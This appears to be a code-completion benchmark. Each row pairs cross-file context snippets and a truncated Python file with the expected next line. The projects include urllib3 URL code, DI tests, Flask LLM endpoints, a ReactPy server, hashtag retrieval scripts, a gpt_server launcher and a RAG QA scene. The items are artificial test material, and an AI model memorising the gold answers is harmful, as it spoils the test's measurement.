str:\n \"\"\"Absolute path including the query string.\"\"\"\n uri = self.path or \"/\"\n\n if self.query is not None:\n uri += \"?\" + self.query\n\n return uri\n\n @property\n def authority(self) -> str | None:\n \"\"\"\n Authority component as defined in RFC 3986 3.2.\n This includes userinfo (auth), host and port.\n\n i.e.\n userinfo@host:port\n \"\"\"\n userinfo = self.auth\n netloc = self.netloc\n if netloc is None or userinfo is None:\n return netloc\n else:\n return f\"{userinfo}@{netloc}\"\n\n @property\n def netloc(self) -> str | None:\n \"\"\"\n Network location including host and port.\n\n If you need the equivalent of urllib.parse's ``netloc``,\n use the ``authority`` property instead.\n \"\"\"\n if self.host is None:\n return None\n if self.port:\n return f\"{self.host}:{self.port}\"\n return self.host\n\n @property\n def url(self) -> str:\n \"\"\"\n Convert self into a url\n\n This function should more or less round-trip with :func:`.parse_url`. The\n returned url may not be exactly the same as the url inputted to\n :func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls\n with a blank port will have : removed).\n\n Example:\n\n .. code-block:: python\n\n import urllib3\n\n U = urllib3.util.parse_url(\"https://google.com/mail/\")\n\n print(U.url)\n # \"https://google.com/mail/\"\n\n print( urllib3.util.Url(\"https\", \"username:password\",\n \"host.com\", 80, \"/path\", \"query\", \"fragment\"\n ).url\n )\n # \"https://username:[email protected]:80/path?query#fragment\"\n \"\"\"\n scheme, auth, host, port, path, query, fragment = self\n url = \"\"\n\n # We use \"is not None\" we want things to happen with empty strings (or 0 port)\n if scheme is not None:\n url += scheme + \"://\"\n if auth is not None:\n url += auth + \"@\"\n if host is not None:\n url += host\n if port is not None:\n url += \":\" + str(port)\n if path is not None:\n url += path\n if query is not None:\n url += \"?\" + query\n if fragment is not None:\n url += \"#\" + fragment\n\n return url\n\n def __str__(self) -> str:\n return self.url"
}
] | import typing
import ssl
from .util.connection import _TYPE_SOCKET_OPTIONS
from .util.timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT
from .util.url import Url
from typing import Literal, Protocol
from .response import BaseHTTPResponse | 1,468 | from __future__ import annotations
_TYPE_BODY = typing.Union[bytes, typing.IO[typing.Any], typing.Iterable[bytes], str]
class ProxyConfig(typing.NamedTuple):
ssl_context: ssl.SSLContext | None
use_forwarding_for_https: bool
assert_hostname: None | str | Literal[False]
assert_fingerprint: str | None
class _ResponseOptions(typing.NamedTuple):
# TODO: Remove this in favor of a better
# HTTP request/response lifecycle tracking.
request_method: str
request_url: str
preload_content: bool
decode_content: bool
enforce_content_length: bool
if typing.TYPE_CHECKING:
class BaseHTTPConnection(Protocol):
default_port: typing.ClassVar[int]
default_socket_options: typing.ClassVar[_TYPE_SOCKET_OPTIONS]
host: str
port: int
timeout: None | (
float
) # Instance doesn't store _DEFAULT_TIMEOUT, must be resolved.
blocksize: int
source_address: tuple[str, int] | None
socket_options: _TYPE_SOCKET_OPTIONS | None
| from __future__ import annotations
_TYPE_BODY = typing.Union[bytes, typing.IO[typing.Any], typing.Iterable[bytes], str]
class ProxyConfig(typing.NamedTuple):
ssl_context: ssl.SSLContext | None
use_forwarding_for_https: bool
assert_hostname: None | str | Literal[False]
assert_fingerprint: str | None
class _ResponseOptions(typing.NamedTuple):
# TODO: Remove this in favor of a better
# HTTP request/response lifecycle tracking.
request_method: str
request_url: str
preload_content: bool
decode_content: bool
enforce_content_length: bool
if typing.TYPE_CHECKING:
class BaseHTTPConnection(Protocol):
default_port: typing.ClassVar[int]
default_socket_options: typing.ClassVar[_TYPE_SOCKET_OPTIONS]
host: str
port: int
timeout: None | (
float
) # Instance doesn't store _DEFAULT_TIMEOUT, must be resolved.
blocksize: int
source_address: tuple[str, int] | None
socket_options: _TYPE_SOCKET_OPTIONS | None
| proxy: Url | None | 3 | 2023-12-16 04:12:01+00:00 | 2k |
neuroglia-io/python-framework | tests/cases/test_service_provider.py | [
{
"identifier": "FileLogger",
"path": "tests/services.py",
"snippet": "class FileLogger(LoggerBase):\n \n def log(text: str):\n with open('example.txt', 'a') as file:\n file.write(f'{text}\\n')"
},
{
"identifier": "LoggerBase",
"path": "tests/services.py",
"snippet": "class LoggerBase(ABC):\n \n @abstractclassmethod\n def log(text: str):\n raise NotImplementedError()"
},
{
"identifier": "NullLogger",
"path": "tests/services.py",
"snippet": "class NullLogger(LoggerBase):\n \n def log(text: str):\n pass"
},
{
"identifier": "PrintLogger",
"path": "tests/services.py",
"snippet": "class PrintLogger(LoggerBase):\n \n def log(text: str):\n print(text)"
}
] | from re import T
from sys import implementation
from neuroglia.dependency_injection.service_provider import IServiceProvider, ServiceCollection, ServiceProvider
from tests.services import FileLogger, LoggerBase, NullLogger, PrintLogger
import pytest | 820 |
class TestServiceProvider:
def test_build_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
#act
service_provider = services.build()
#assert
assert service_provider is not None, 'service_provider is none'
def test_get_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_unregistered_service_should_work(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is None, 'logger is not none'
def test_get_required_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_required_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_required_unregistered_service_should_raise_error(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_scoped_service_from_root_should_raise_error(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_scoped(LoggerBase, implementation_type)
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_services_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
service_provider = services.build()
#act
loggers = service_provider.get_services(LoggerBase)
#assert
assert len(loggers) == 3, f'expected 3 loggers, got {len(loggers)}'
def test_create_scope_should_work(self):
pass
def test_get_scoped_service_should_work(self):
pass
|
class TestServiceProvider:
def test_build_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
#act
service_provider = services.build()
#assert
assert service_provider is not None, 'service_provider is none'
def test_get_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_unregistered_service_should_work(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#act
logger = service_provider.get_service(LoggerBase)
#assert
assert logger is None, 'logger is not none'
def test_get_required_service_should_work(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_singleton(LoggerBase, implementation_type)
service_provider = services.build()
#act
logger = service_provider.get_required_service(LoggerBase)
#assert
assert logger is not None, 'logger is none'
assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'"
def test_get_required_unregistered_service_should_raise_error(self):
#arrange
services = ServiceCollection()
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_scoped_service_from_root_should_raise_error(self):
#arrange
services = ServiceCollection()
implementation_type = PrintLogger
services.add_scoped(LoggerBase, implementation_type)
service_provider = services.build()
#assert
with pytest.raises(Exception):
service_provider.get_required_service(LoggerBase)()
def test_get_services_should_work(self):
#arrange
services = ServiceCollection()
services.add_singleton(LoggerBase, PrintLogger)
services.add_singleton(LoggerBase, singleton = FileLogger())
services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger)
service_provider = services.build()
#act
loggers = service_provider.get_services(LoggerBase)
#assert
assert len(loggers) == 3, f'expected 3 loggers, got {len(loggers)}'
def test_create_scope_should_work(self):
pass
def test_get_scoped_service_should_work(self):
pass
| def _build_null_logger(self, provider : IServiceProvider) -> NullLogger: return NullLogger() | 2 | 2023-12-15 14:36:50+00:00 | 2k |
Vlodson/Faculty-Choice-Assistant | backend/server/endpoints/natural_language.py | [
{
"identifier": "make_thread_for_user",
"path": "backend/llm/threads.py",
"snippet": "def make_thread_for_user() -> Thread:\n return CLIENT.beta.threads.create()"
},
{
"identifier": "retrieve_thread_for_user",
"path": "backend/llm/threads.py",
"snippet": "def retrieve_thread_for_user(thread_id: str) -> Thread:\n return CLIENT.beta.threads.retrieve(thread_id=thread_id)"
},
{
"identifier": "send_setup_message",
"path": "backend/llm/threads.py",
"snippet": "def send_setup_message(thread: Thread) -> ThreadMessage:\n msg = (\n \"The file ontology.ttl has an RDF ontology in turtle syntax. \"\n + \"Please review the contents of the file. \"\n + \"After that each prompt will ask you to create a SPARQL query for a certain question, \"\n + \"using ONLY information from ontology.ttl. \"\n + \"Always add: PREFIX edu: <YOUR_ONTOLOGY.TTL_PATH_HERE> to your queries\"\n )\n return CLIENT.beta.threads.messages.create(\n thread_id=thread.id, role=\"user\", content=msg\n )"
},
{
"identifier": "send_user_message",
"path": "backend/llm/threads.py",
"snippet": "def send_user_message(thread: Thread, msg: str) -> ThreadMessage:\n return CLIENT.beta.threads.messages.create(\n thread_id=thread.id, role=\"user\", content=__contextualize_user_message(msg)\n )"
},
{
"identifier": "create_run_for_thread",
"path": "backend/llm/threads.py",
"snippet": "def create_run_for_thread(thread: Thread, run: Optional[Run] = None) -> Run:\n if not run:\n return CLIENT.beta.threads.runs.create(\n thread_id=thread.id, assistant_id=ASSISTANT.id\n )\n\n run_info = retrieve_run_for_user(run_id=run.id, thread_id=thread.id)\n while run.status != \"completed\":\n run_info = retrieve_run_for_user(run_id=run_info.id, thread_id=thread.id)\n\n return CLIENT.beta.threads.runs.create(\n thread_id=thread.id, assistant_id=ASSISTANT.id\n )"
},
{
"identifier": "retrieve_run_for_user",
"path": "backend/llm/threads.py",
"snippet": "def retrieve_run_for_user(run_id: str, thread_id: str) -> Run:\n return CLIENT.beta.threads.runs.retrieve(run_id=run_id, thread_id=thread_id)"
},
{
"identifier": "get_last_message",
"path": "backend/llm/threads.py",
"snippet": "def get_last_message(thread: Thread, run: Run) -> ThreadMessage:\n # wait untill the message is done writing\n # this does not have any fail exits\n run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id)\n while run_info.status != \"completed\":\n run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id)\n\n return list(msg for msg in CLIENT.beta.threads.messages.list(thread.id))[0]"
},
{
"identifier": "get_query_from_message",
"path": "backend/llm/threads.py",
"snippet": "def get_query_from_message(msg: ThreadMessage) -> Optional[str]:\n raw_msg = msg.content[0].text.value\n start_delim = r\"```sparql\"\n end_delim = r\"```\"\n\n start_index = raw_msg.find(start_delim)\n end_index = raw_msg.find(end_delim, start_index + len(start_delim))\n\n if start_index != -1 and end_index != -1:\n return raw_msg[start_index + len(start_delim) : end_index]\n\n return None"
},
{
"identifier": "apply_query",
"path": "backend/ontology/queries.py",
"snippet": "def apply_query(query: str) -> Result:\n return GRAPH.query(query_object=query)"
},
{
"identifier": "query_results_to_table",
"path": "backend/ontology/queries.py",
"snippet": "def query_results_to_table(results: Result) -> Dict:\n return {\n __readable_property_name(str(key)): [\n __clean_property_value(str(row[key])) for row in results\n ]\n for key in results.__dict__[\"vars\"]\n }"
},
{
"identifier": "SendMessageRequest",
"path": "backend/server/endpoints/custom_types.py",
"snippet": "class SendMessageRequest(TypedDict):\n thread_id: str\n run_id: str\n msg: str"
},
{
"identifier": "SetupUserResponse",
"path": "backend/server/endpoints/custom_types.py",
"snippet": "class SetupUserResponse(TypedDict):\n thread_id: str\n run_id: str"
}
] | from flask import Blueprint, abort, request, jsonify
from backend.llm.threads import (
make_thread_for_user,
retrieve_thread_for_user,
send_setup_message,
send_user_message,
create_run_for_thread,
retrieve_run_for_user,
get_last_message,
get_query_from_message,
)
from backend.ontology.queries import apply_query, query_results_to_table
from backend.server.endpoints.custom_types import SendMessageRequest, SetupUserResponse | 1,080 |
bp = Blueprint("llm", __name__)
@bp.route("/setup", methods=["GET"])
def setup_user() -> SetupUserResponse:
thread = make_thread_for_user()
_ = send_setup_message(thread)
|
bp = Blueprint("llm", __name__)
@bp.route("/setup", methods=["GET"])
def setup_user() -> SetupUserResponse:
thread = make_thread_for_user()
_ = send_setup_message(thread) | run = create_run_for_thread(thread) # for easier expansion of the API | 4 | 2023-12-21 17:55:05+00:00 | 2k |
stevej2608/reactpy-apexcharts | utils/fast_server.py | [
{
"identifier": "log",
"path": "utils/logger.py",
"snippet": ""
},
{
"identifier": "var_name",
"path": "utils/var_name.py",
"snippet": "def var_name(obj: Any, namespace: Dict[str, Any]) -> str:\r\n \"\"\"Return var name as a string\r\n\r\n Args:\r\n obj (Any): Variable ty be named\r\n namespace (Dict[str, Any]): _description_\r\n\r\n Returns:\r\n str: The objects name\r\n\r\n Usage:\r\n ```\r\n from utils.var_name import var_name\r\n \r\n app = FastAPI(...)\r\n\r\n app_name = var_name(app, globals())\r\n ```\r\n \"\"\"\r\n return [name for name in namespace if namespace[name] is obj][0]\r"
},
{
"identifier": "DEFAULT_OPTIONS",
"path": "utils/fast_server_options.py",
"snippet": "DEFAULT_OPTIONS=Options(\r\n head=html.head(\r\n html.meta(META_VIEWPORT),\r\n html.meta(META_COLOR),\r\n html.title(PAGE_HEADER_TITLE),\r\n )\r\n)\r"
}
] | from typing import Callable
from fastapi import FastAPI
from reactpy.core.component import Component
from reactpy.backend.fastapi import configure, Options
from .logger import log, logging
from .var_name import var_name
from .fast_server_options import DEFAULT_OPTIONS
import sys
import signal
import multiprocessing
import uvicorn | 802 |
app = FastAPI(description="ReactPy", version="0.1.0")
LOGS = [
"asgi-logger",
"concurrent.futures",
"concurrent",
"asyncio",
"uvicorn.error",
"uvicorn",
"watchfiles.watcher",
"watchfiles",
"watchfiles.main",
"fastapi",
"reactpy.backend",
"reactpy",
"reactpy._option",
"reactpy.core.hooks",
"reactpy.core",
"urllib3.util.retry",
"urllib3.util",
"urllib3",
"urllib3.connection",
"urllib3.response",
"urllib3.connectionpool",
"urllib3.poolmanager",
"charset_normalizer",
"requests",
"reactpy.web.utils",
"reactpy.web",
"reactpy.web.module",
"reactpy.backend.utils",
"reactpy.core.layout",
"reactpy.core.serve",
"reactpy.backend.starlette",
"uvicorn.access",
"starlette",
]
def disable_noisy_logs():
# Turn off noisy logging
for log_id in LOGS:
_log = logging.getLogger(log_id)
_log.setLevel(logging.ERROR)
def handler(signum, frame):
active = multiprocessing.active_children()
for child in active:
child.terminate()
def run(AppMain: Callable[[], Component],
options:Options=DEFAULT_OPTIONS,
host='127.0.0.1',
port=8000,
disable_server_logs=False,
**kwargs) -> None:
"""Called once to run reactpy application on the fastapi server
Args:
AppMain (Callable[[], Component]): Function that returns a reactpy Component
options (Options, optional): Server options. Defaults to DASHBOARD_OPTIONS.
Usage:
```
@component
def AppMain():
return html.h2('Hello from reactPy!')
)
run(AppMain, options=PICO_OPTIONS)
```
"""
def _app_path(app: FastAPI) -> str:
app_str = var_name(app, globals())
return f"{__name__}:{app_str}"
configure(app, AppMain, options=options)
app_path = _app_path(app)
@app.on_event('startup')
async def fastapi_startup():
if disable_server_logs:
disable_noisy_logs()
|
app = FastAPI(description="ReactPy", version="0.1.0")
LOGS = [
"asgi-logger",
"concurrent.futures",
"concurrent",
"asyncio",
"uvicorn.error",
"uvicorn",
"watchfiles.watcher",
"watchfiles",
"watchfiles.main",
"fastapi",
"reactpy.backend",
"reactpy",
"reactpy._option",
"reactpy.core.hooks",
"reactpy.core",
"urllib3.util.retry",
"urllib3.util",
"urllib3",
"urllib3.connection",
"urllib3.response",
"urllib3.connectionpool",
"urllib3.poolmanager",
"charset_normalizer",
"requests",
"reactpy.web.utils",
"reactpy.web",
"reactpy.web.module",
"reactpy.backend.utils",
"reactpy.core.layout",
"reactpy.core.serve",
"reactpy.backend.starlette",
"uvicorn.access",
"starlette",
]
def disable_noisy_logs():
# Turn off noisy logging
for log_id in LOGS:
_log = logging.getLogger(log_id)
_log.setLevel(logging.ERROR)
def handler(signum, frame):
active = multiprocessing.active_children()
for child in active:
child.terminate()
def run(AppMain: Callable[[], Component],
options:Options=DEFAULT_OPTIONS,
host='127.0.0.1',
port=8000,
disable_server_logs=False,
**kwargs) -> None:
"""Called once to run reactpy application on the fastapi server
Args:
AppMain (Callable[[], Component]): Function that returns a reactpy Component
options (Options, optional): Server options. Defaults to DASHBOARD_OPTIONS.
Usage:
```
@component
def AppMain():
return html.h2('Hello from reactPy!')
)
run(AppMain, options=PICO_OPTIONS)
```
"""
def _app_path(app: FastAPI) -> str:
app_str = var_name(app, globals())
return f"{__name__}:{app_str}"
configure(app, AppMain, options=options)
app_path = _app_path(app)
@app.on_event('startup')
async def fastapi_startup():
if disable_server_logs:
disable_noisy_logs() | log.info("Uvicorn running on http://%s:%s (Press CTRL+C to quit)", host, port) | 0 | 2023-12-19 16:05:41+00:00 | 2k |
ict-bigdatalab/RIGHT | retrieval_analysis.py | [
{
"identifier": "read_line_examples_from_file",
"path": "get_datasets.py",
"snippet": "def read_line_examples_from_file(data_path):\n sequence = []\n with open(data_path, 'r', encoding='utf-8') as f:\n for line in f:\n line = line.strip(\"\\n\")\n if not line:\n continue\n sequence.append(line.strip())\n return sequence"
},
{
"identifier": "f1",
"path": "eval_utils.py",
"snippet": "def f1(pre, rec):\n if pre == 0 and rec == 0:\n return 0.0\n return 2 * pre * rec / (pre + rec)"
}
] | import json
from get_datasets import read_line_examples_from_file
from tqdm import tqdm
from eval_utils import f1 | 816 |
def get_hashtag_list(dst):
tags = dst.split('[SEP]')
target = []
for j in range(len(tags)):
tags[j] = tags[j].strip()
if tags[j] != '':
target.append(tags[j])
# if the dst is nothing
if len(target) == 0:
target.append('None')
# statistic_hashtags(hashtags)
return target
def retrieval_analysis(src_path, label_path, rev_index_path, document_path, out_path):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[document_list[index] for index in rev_index[i]["index"]] for i in range(len(src_list))]
with open(out_path, 'w', encoding='UTF-8') as fp:
for i in tqdm(range(len(src_list))):
line = str(i) + '\n' + src_list[i] + '\n' + dst_list[i] + '\n'
for k in range(len(rev_dst[i])):
line = line + str(rev_index[i]['score'][k]) + '\t' + rev_dst[i][k] + '\n'
line += '\n'
fp.write(line)
def retrieval_hashtag_score_analysis(src_path, label_path, rev_index_path, document_path, top_k):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[get_hashtag_list(document_list[index]) for index in rev_index[i]["index"]] for i in range(len(src_list))]
dst_list = [get_hashtag_list(dst) for dst in dst_list]
total_p = 0
total_r = 0
true_num = 0
for i in tqdm(range(len(src_list))):
label = dst_list[i]
hashtag_score = dict()
for k in range(len(rev_dst[i])):
for rev_hashtag in rev_dst[i][k]:
if rev_hashtag not in hashtag_score.keys():
hashtag_score[rev_hashtag] = 0
hashtag_score[rev_hashtag] += rev_index[i]['score'][k]
hashtag_score = sorted(hashtag_score.items(), key=lambda x: x[1], reverse=True)[:top_k]
total_p += len(hashtag_score)
total_r += len(label)
for rev_hashtag_pair in hashtag_score:
for lab in label:
if rev_hashtag_pair[0] == lab or rev_hashtag_pair[0] in lab or lab in rev_hashtag_pair[0]:
true_num += 1
p = true_num / total_p
r = true_num / total_r
|
def get_hashtag_list(dst):
tags = dst.split('[SEP]')
target = []
for j in range(len(tags)):
tags[j] = tags[j].strip()
if tags[j] != '':
target.append(tags[j])
# if the dst is nothing
if len(target) == 0:
target.append('None')
# statistic_hashtags(hashtags)
return target
def retrieval_analysis(src_path, label_path, rev_index_path, document_path, out_path):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[document_list[index] for index in rev_index[i]["index"]] for i in range(len(src_list))]
with open(out_path, 'w', encoding='UTF-8') as fp:
for i in tqdm(range(len(src_list))):
line = str(i) + '\n' + src_list[i] + '\n' + dst_list[i] + '\n'
for k in range(len(rev_dst[i])):
line = line + str(rev_index[i]['score'][k]) + '\t' + rev_dst[i][k] + '\n'
line += '\n'
fp.write(line)
def retrieval_hashtag_score_analysis(src_path, label_path, rev_index_path, document_path, top_k):
src_list = read_line_examples_from_file(src_path)
dst_list = read_line_examples_from_file(label_path)
document_list = read_line_examples_from_file(document_path)
with open(rev_index_path, 'r', encoding='UTF-8') as fp:
rev_index = json.load(fp)
rev_dst = [[get_hashtag_list(document_list[index]) for index in rev_index[i]["index"]] for i in range(len(src_list))]
dst_list = [get_hashtag_list(dst) for dst in dst_list]
total_p = 0
total_r = 0
true_num = 0
for i in tqdm(range(len(src_list))):
label = dst_list[i]
hashtag_score = dict()
for k in range(len(rev_dst[i])):
for rev_hashtag in rev_dst[i][k]:
if rev_hashtag not in hashtag_score.keys():
hashtag_score[rev_hashtag] = 0
hashtag_score[rev_hashtag] += rev_index[i]['score'][k]
hashtag_score = sorted(hashtag_score.items(), key=lambda x: x[1], reverse=True)[:top_k]
total_p += len(hashtag_score)
total_r += len(label)
for rev_hashtag_pair in hashtag_score:
for lab in label:
if rev_hashtag_pair[0] == lab or rev_hashtag_pair[0] in lab or lab in rev_hashtag_pair[0]:
true_num += 1
p = true_num / total_p
r = true_num / total_r | f = f1(p, r) | 1 | 2023-12-16 06:00:53+00:00 | 2k |
shell-nlp/gpt_server | gpt_server/serving/main.py | [
{
"identifier": "get_free_tcp_port",
"path": "gpt_server/utils.py",
"snippet": "def get_free_tcp_port():\n \"\"\"获取可用的端口\"\"\"\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp.bind((\"\", 0))\n _, port = tcp.getsockname()\n tcp.close()\n return port"
},
{
"identifier": "start_server",
"path": "gpt_server/utils.py",
"snippet": "def start_server(host, port):\n \"\"\"启动服务\"\"\"\n start_controller()\n start_openai_server(host, port)"
},
{
"identifier": "run_cmd",
"path": "gpt_server/utils.py",
"snippet": "def run_cmd(cmd):\n print(\"执行命令命令如下:\")\n print(cmd) # 执行\n subprocess.run(cmd, shell=True)"
},
{
"identifier": "stop_server",
"path": "gpt_server/utils.py",
"snippet": "def stop_server():\n \"\"\"停止服务\"\"\"\n stop_fastchat = (\n \"ps -ef | grep fastchat.serve | awk '{print $2}' |xargs -I{} kill -9 {}\"\n )\n stop_gpt_server = (\n \"ps -ef | grep gpt_server | awk '{print $2}' |xargs -I{} kill -9 {}\"\n )\n run_cmd(stop_fastchat)\n run_cmd(stop_gpt_server)\n print(\"停止服务成功!\")"
},
{
"identifier": "delete_log",
"path": "gpt_server/utils.py",
"snippet": "def delete_log(root_path):\n datanames = os.listdir(os.path.join(root_path, \"serving\")) # 查找本目录下所有文件\n for dataname in datanames:\n if (\n dataname.startswith(\"model_worker\")\n or dataname.startswith(\"openai_api_server\")\n or dataname.startswith(\"controller.log\")\n ):\n # print(os.path.join(root_path,f\"serving/{dataname}\"))\n os.remove(os.path.join(root_path, f\"serving/{dataname}\"))"
}
] | import yaml
import os
import sys
import subprocess
import signal
from pprint import pprint
from multiprocessing import Process
from gpt_server.utils import get_free_tcp_port, start_server, run_cmd, stop_server,delete_log | 1,037 |
# Set up the project root directory
root_dir = os.path.join(os.path.dirname(__file__), "..")
root_dir = os.path.abspath(root_dir)
sys.path.append(root_dir)
# Delete logs
delete_log(root_dir)
def signal_handler(signum, frame):
stop_server()
raise KeyboardInterrupt
signal.signal(signal.SIGINT, signal_handler)
with open("./config.yaml", "r") as f:
config = yaml.safe_load(f)
print(config)
# ---------------------------- Start the Controller and OpenAI API services ----------------------------------------------------
host = config["serve_args"]["host"]
port = config["serve_args"]["port"]
start_server(host, port)
# ---------------------------- Start the Controller and OpenAI API services ----------------------------------------------------
for model_name, model_config in config["models"].items():
    # Enabled models
if model_config["enable"]:
pprint(model_config)
print()
        # Model path
model_name_or_path = model_config["model_name_or_path"]
        # Model type
model_type = model_config["model_type"]
        # Validate the model type
py_path = f"{root_dir}/model_worker/{model_type}.py"
model_names = model_name
if model_config["alias"]:
model_names = model_name + "," + model_config["alias"]
        # Get the number of workers and the resources of each worker
workers = model_config["workers"]
# if model_config["work_mode"] == "deepspeed":
        # Set up DeepSpeed usage
process = []
for worker in workers:
gpus = worker["gpus"]
            # Convert gpus int ---> str
gpus = [str(i) for i in gpus]
gpus_str = ",".join(gpus)
num_gpus = len(gpus)
if model_config["work_mode"] == "deepspeed":
os.environ["USE_DS"] = "1"
run_mode = f"deepspeed --num_gpus {num_gpus} "
pass
elif model_config["work_mode"] == "accelerate":
os.environ["USE_ACC"] = "1"
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
elif model_config["work_mode"] == "hf":
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
            # DS (DeepSpeed) only takes effect inside the code
# os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
cmd = (
run_mode
+ py_path
+ f" --gpus {gpus_str}"
|
# Set up the project root directory
root_dir = os.path.join(os.path.dirname(__file__), "..")
root_dir = os.path.abspath(root_dir)
sys.path.append(root_dir)
# Delete logs
delete_log(root_dir)
def signal_handler(signum, frame):
stop_server()
raise KeyboardInterrupt
signal.signal(signal.SIGINT, signal_handler)
with open("./config.yaml", "r") as f:
config = yaml.safe_load(f)
print(config)
# ---------------------------- Start the Controller and OpenAI API services ----------------------------------------------------
host = config["serve_args"]["host"]
port = config["serve_args"]["port"]
start_server(host, port)
# ---------------------------- Start the Controller and OpenAI API services ----------------------------------------------------
for model_name, model_config in config["models"].items():
    # Enabled models
if model_config["enable"]:
pprint(model_config)
print()
        # Model path
model_name_or_path = model_config["model_name_or_path"]
        # Model type
model_type = model_config["model_type"]
        # Validate the model type
py_path = f"{root_dir}/model_worker/{model_type}.py"
model_names = model_name
if model_config["alias"]:
model_names = model_name + "," + model_config["alias"]
        # Get the number of workers and the resources of each worker
workers = model_config["workers"]
# if model_config["work_mode"] == "deepspeed":
        # Set up DeepSpeed usage
process = []
for worker in workers:
gpus = worker["gpus"]
            # Convert gpus int ---> str
gpus = [str(i) for i in gpus]
gpus_str = ",".join(gpus)
num_gpus = len(gpus)
if model_config["work_mode"] == "deepspeed":
os.environ["USE_DS"] = "1"
run_mode = f"deepspeed --num_gpus {num_gpus} "
pass
elif model_config["work_mode"] == "accelerate":
os.environ["USE_ACC"] = "1"
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
elif model_config["work_mode"] == "hf":
os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
run_mode = "python "
pass
            # DS (DeepSpeed) only takes effect inside the code
# os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str
cmd = (
run_mode
+ py_path
+ f" --gpus {gpus_str}" | + f" --master_port {get_free_tcp_port()}" | 0 | 2023-12-16 07:43:28+00:00 | 2k |
LLM-Evaluation-s-Always-Fatiguing/leaf-playground-hub | rag_qa/rag_qa/scene.py | [
{
"identifier": "Examiner",
"path": "rag_qa/rag_qa/agents/examiner.py",
"snippet": "class Examiner(SceneStaticAgent, role_definition=ROLE_DEFINITION, cls_description=\"An agent who minitor the examine\"):\n config_cls = ExaminerConfig\n config: config_cls\n\n def __init__(self, config: config_cls):\n super().__init__(config=config)\n\n self._cur = 0\n self._questions = []\n self._dataset_config: DatasetConfig = None\n\n def prepare_questions(\n self,\n dataset_config: DatasetConfig,\n ) -> None:\n self._cur = 0\n self._questions = prepare_dataset(dataset_config)\n self._dataset_config = dataset_config\n\n def send_question(self, receivers: List[Profile]) -> ExaminerQuestion:\n question = ExaminerQuestion(\n sender=self.profile,\n receivers=receivers,\n content=Text(text=self._questions[self._cur][self._dataset_config.question_column]),\n question_id=self._cur\n )\n self._cur += 1\n return question\n\n def check_examine_finish(self) -> bool:\n return self._cur >= len(self._questions)\n\n def get_golden_answer(self, question_id: int) -> Optional[dict]:\n result = {}\n if self._dataset_config.golden_answer_column:\n result['golden_answer'] = self._questions[question_id][self._dataset_config.golden_answer_column]\n if self._dataset_config.ground_truth_column:\n result['ground_truths'] = self._questions[question_id][self._dataset_config.ground_truth_column]\n return result"
},
{
"identifier": "AIBaseExaminee",
"path": "rag_qa/rag_qa/agents/base_examinee.py",
"snippet": "class AIBaseExaminee(SceneAIAgent, ABC, role_definition=ROLE_DEFINITION):\n config_cls = AIBaseExamineeConfig\n config: config_cls\n\n @abstractmethod\n async def answer_question(self, question: ExaminerQuestion, examiner: Profile) -> ExamineeAnswer:\n pass"
},
{
"identifier": "DatasetConfig",
"path": "rag_qa/rag_qa/dataset_utils.py",
